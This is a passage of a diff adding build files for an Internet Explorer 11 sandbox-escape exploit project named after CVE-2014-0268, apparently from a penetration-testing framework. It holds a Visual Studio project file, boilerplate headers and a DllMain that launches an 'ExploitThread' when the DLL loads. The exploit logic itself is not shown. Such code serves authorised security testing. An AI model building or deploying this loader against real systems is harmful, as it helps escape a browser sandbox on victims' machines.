+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2014-0268.cpp" />
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+      <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp

@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+

external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h

@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>

external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h

@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>